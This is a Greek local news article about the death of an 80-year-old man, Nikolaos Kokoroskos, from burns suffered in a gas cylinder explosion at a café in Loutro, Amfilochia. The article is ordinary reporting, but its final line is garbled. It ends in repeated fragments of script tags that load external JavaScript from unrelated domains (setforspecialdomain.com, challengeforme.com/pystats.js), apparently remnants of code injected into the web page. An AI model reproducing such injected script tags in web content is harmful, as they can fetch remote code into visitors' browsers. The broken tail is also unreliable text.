Υπέκυψε ένας από τους τραυματίες στο καφενείο της Αμφιλοχίας

Υπέκυψε ένας από τους τραυματίες στο καφενείο της Αμφιλοχίας

Τραγική εξέλιξη είχε τελικά το επεισόδιο της έκρηξης φιάλης υγραερίου σε καφενείο στο χωριό Λουτρό της Αμφιλοχίας την προηγούμενη Τετάρτη στις 4 Φεβρουαρίου.

Χθες το πρωί άφησε την τελευταία του πνοή 80χρονος Νικόλαος Κοκορόσκος που νοσηλευόταν σε κρίσιμη κατάσταση στο Γενικό Νοσοκομείο Αθηνών Γ. Γεννηματάς.

Ο άτυχος ηλικιωμένος, μόνιμος κάτοικος Λουτρού, βρισκόταν πάντα την ίδια ώρα στο στέκι του, στο καφενείο του χωριού, για τον καθημερινό του καφέ.

Δεν περίμενε όμως πως μια απλή φιάλη υγραερίου θα εξελισσόταν σε ωρολογιακή βόμβα και θα έσπερνε την καταστροφή και τον θάνατο.

Αμέσως μετά την έκρηξη ο άτυχος συνταξιούχος μαζί με τους υπόλοιπους τραυματίες μεταφέρθηκαν στα κοντινά νοσοκομεία της περιοχής ενώ τα πιο σοβαρά περιστατικά όπως αυτό του 80χρονου μεταφέρθηκαν για νοσηλεία στην Αθήνα.

Ανάμεσα στους ανθρώπους που νοσηλεύονται σε κρίσιμη κατάσταση είναι και η ιδιοκτήτρια του καφενείου η οποία βρίσκεται στον Ευαγγελισμό ενώ ο σύζυγός της μην αντέχοντας την καταστροφή που συνέβη βρίσκεται σε άσχημη ψυχολογική κατάσταση και νοσηλεύεται και εκείνος.

Σύμφωνα με τον αντιδήμαρχο Αμφιλοχίας Γρηγόρη Παπούλια ο 80χρονος θαμώνας του καφενείου δεν άντεξε λόγο γήρατος τα εγκαύματα τρίτου βαθμού και άφησε την τελευταία του πνοή. Εύχεται να πάνε καλά τα πράγματα για τους υπόλοιπους πέντε που νοσηλεύονται σε κρίσιμη κατάσταση στην Αθήνα.

Η έκρηξη ήταν τόσο ισχυρή που το γραφικό καφενείο καταστράφηκε ολοσχερώς.
Μάλιστα αυτόπτες μάρτυρες ανέφεραν πως από το ωστικό κύμα της έκρηξης, άνθρωποι και αντικείμενα εκσφενδονίστηκαν περίπου στα 10 μέτρα μακριά.

Από την έκρηξη τραυματίστηκαν τουλάχιστον 15 άνθρωποι από τους οποίους οι πέντε βρίσκονται ακόμα σε πολύ κρίσιμη κατάσταση και έχουν μεταφερθεί σε νοσοκομεία της Αθήνας.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >